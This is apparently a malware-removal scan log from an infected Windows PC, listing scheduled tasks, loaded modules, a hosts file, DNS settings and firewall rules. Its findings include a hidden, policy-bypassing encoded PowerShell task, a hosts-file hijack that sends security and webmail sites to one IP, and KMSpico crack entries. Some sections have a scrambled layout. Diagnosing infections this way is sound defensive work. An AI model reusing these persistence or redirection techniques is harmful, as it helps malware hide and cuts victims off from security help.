=> C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03
] (Oracle Corporation)
Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUs
erS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData
\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\Ma
nifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLIn
stallerConsole.exe [2015-08-20] (Oracle Corporation)
Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskU
serS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\
Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)
Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-414
9-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090
5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter
active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA
GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA
G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA
GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters).
Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA4
7-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft
Corporation)
Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A
5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMa
chineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18]
(Google Inc.)
Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDown
loaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program F
iles (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNe
tworks, Inc.)
Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater =>
C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (Reimage®) <=
=== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The
file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Mac
romed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736
1095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdat
e.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736
1095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.
exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)
\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\G
oogle\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361
095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.e
xe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361
095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\S
ynaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\
bin\hpqwrg.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk ->
C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide
"C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat"
==================== Loaded Modules (Whitelisted) ==============
2011-10-13 15:38 - 2011-10-13 15:38 - 00156672
OSHIBA\Password Utility\GFNEXSrv.exe
2014-12-24 17:10 - 2014-08-06 03:04 - 01441792
ing\Everything.exe
2016-03-11 20:25 - 2013-11-15 14:38 - 00066048
EALTEK\Realtek Bluetooth\BTDevMgr.exe
2015-09-18 17:53 - 2015-09-18 17:53 - 13067264
ySQL Server 5.6\bin\mysqld.exe
2016-02-03 18:49 - 2016-02-03 18:49 - 00032544
eal\UpdateService\RealPlayerUpdateSvc.exe
2015-08-19 10:56 - 2015-08-19 10:56 - 06908904
\Reimage Protector\ReiSystem.exe
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856
2k.dll
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872
UIComponents.dll
_____ () C:\Program Files (x86)\T
_____ () C:\Program Files\Everyth
_____ () C:\Program Files (x86)\R
_____ () C:\Program Files\MySQL\M
_____ () C:\Program Files (x86)\R
_____ () C:\Program Files\Reimage
_____ () C:\WINDOWS\SYSTEM32\ism3
_____ () C:\WINDOWS\system32\Core
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\Core
UIComponents.dll
2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microso
ft Office\Office15\1033\GrooveIntlResource.dll
2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\Sh
ellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\Sh
ellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spoo
l\drivers\x64\3\WrtMon.exe
2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppDat
a\Local\MalwareProtectionLive\MalwareProtectionClient.exe
2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\D
NS Unlocker\dnswalters.exe
2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos
.exe
2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos
.dll
2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromo
tion.dll
2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\M
endeley Desktop\MendeleyWordPlugin.exe
2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\downloader2.exe
2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\R
eal\UpdateService\DL2UpdatePlugin.dll
2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\R
eal\UpdateService\RealDownloaderUpdatePlugin.dll
2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\R
eal\UpdateService\VideoDLUpdatePlugin.dll
2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\I
ntel\Intel(R) Management Engine Components\UNS\ACE.dll
2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\dtvhooks.dll
2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\r
eal\realplayer\CrashRpt\CrashRpt1402.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\mediautil.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32api.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pywintypes27.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pythoncom27.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32com.shell.shell.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_hashlib.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._core_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._gdi_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._windows_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._controls_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._misc_.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_ctypes.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32file.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32security.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\hashobjs_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\thumbnails_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\usb_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32gui.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00018432 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32event.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_socket.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_ssl.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_elementtree.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pyexpat.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\common.time34.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32inet.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_psutil_windows.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32crypt.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._html2.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_multiprocessing.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_yappi.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32process.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\unicodedata.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._animate.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._wizard.pyd
2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32pipe.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\select.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32pdh.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32profile.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32ts.pyd
2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dl
l
2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\M
icrosoft Office\Office15\1033\GrooveIntlResource.dll
2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\M
endeley Desktop\Mendeley.dll
2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\cpprest100_1_2.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Lib\r1api.dll
2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\videodl.exe
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642]
C:\ProgramData\TEMP:05E9FFE5 [145]
C:\ProgramData\TEMP:5C1D8A71 [138]
C:\ProgramData\TEMP:661DFA1C [117]
C:\ProgramData\TEMP:DBC416F8 [286]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. T
he "AlternateShell" will be restored.)
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to d
efault or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partition
guru.com -> hxxp://www.partitionguru.com
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers
\etc\hosts
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
www.malwaretips.com
malwareremovalguides.info
onlinevirusrepair.com
enigmasoftware.com
pcrisk.com
malwarebytes.org/
tomshardware.co.uk
malwaretips.com
answers.yahoo.com
www.malwareremovalguides.info
www.onlinevirusrepair.com
www.enigmasoftware.com
www.pcrisk.com
guides.yoosecurity.com
www.malwarebytes.org/
www.tomshardware.co.uk
www.gmail.com
gmail.com
www.hotmail.com
hotmail.com
www.mail.ru
mail.ru
www.torrentz.eu
torrentz.eu
www.kat.ph
kat.ph
www.thepiratebay.se
thepiratebay.se
www.thepiratebay.org
thepiratebay.org
There are 356 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpap
er -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\
DesktopBackground\img0.jpg
HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpape
r -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg
DNS Servers: 82.163.143.171 - 82.163.142.173
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPrompt
BehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
HKLM\...\StartupApproved\Run: => "Everything"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKLM\...\StartupApproved\Run: => "Persistence"
HKLM\...\StartupApproved\Run: => "RtHDVCpl"
HKLM\...\StartupApproved\Run: => "TecoResident"
HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD"
HKLM\...\StartupApproved\Run: => "TCrdMain"
HKLM\...\StartupApproved\Run: => "TODDMain"
HKLM\...\StartupApproved\Run: => "TosWaitSrv"
HKLM\...\StartupApproved\Run32: => "autodetect"
HKLM\...\StartupApproved\Run32: => "Everything"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe"
HKLM\...\StartupApproved\Run32: => "TPUReg"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFol
der: => "Dropbox.lnk"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "G
oogle Update"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "I
DMan"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S
kype"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S
creencast-O-Matic Tray"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "V
See"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\
system32\alg.exe
FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program f
iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti
fy\connectify.exe
FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program f
iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti
fy\connectify.exe
FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Fi
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Fi
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688
FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe
FirewallRules: [{7180087A-69A0-49FC-A8C0-88DDD581BDD7}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe
FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow)
les\KMSpico\Service_KMS.exe
FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow)
les\KMSpico\Service_KMS.exe
FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow)
les\KMSpico\KMSELDI.exe
FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow)
les\KMSpico\KMSELDI.exe
FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow)
FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow)
les (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow)
FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow)
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow)
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow)
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow)
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow)
les (x86)\Intel\IntelAppStore\bin\ismagent.exe
FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow)
les (x86)\Spotify\spotify.exe
FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow)
les (x86)\Spotify\spotify.exe
FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow)
les (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow)
les (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow)
RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow)
RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow)
les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow)
les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow)
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow)
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow)
RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow)
RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\stats.com
FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe
FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\stats.exe
FirewallRules: [{AEE1A837-3B32-4F4E-84D3-C59B67FC0D4F}] => (Allow)
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
LPort=1688
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
LPort=3306
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Users\REVE
C:\Users\REVE
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Users\REVE
C:\Users\REVE
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.com
FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe
FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.exe
FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe
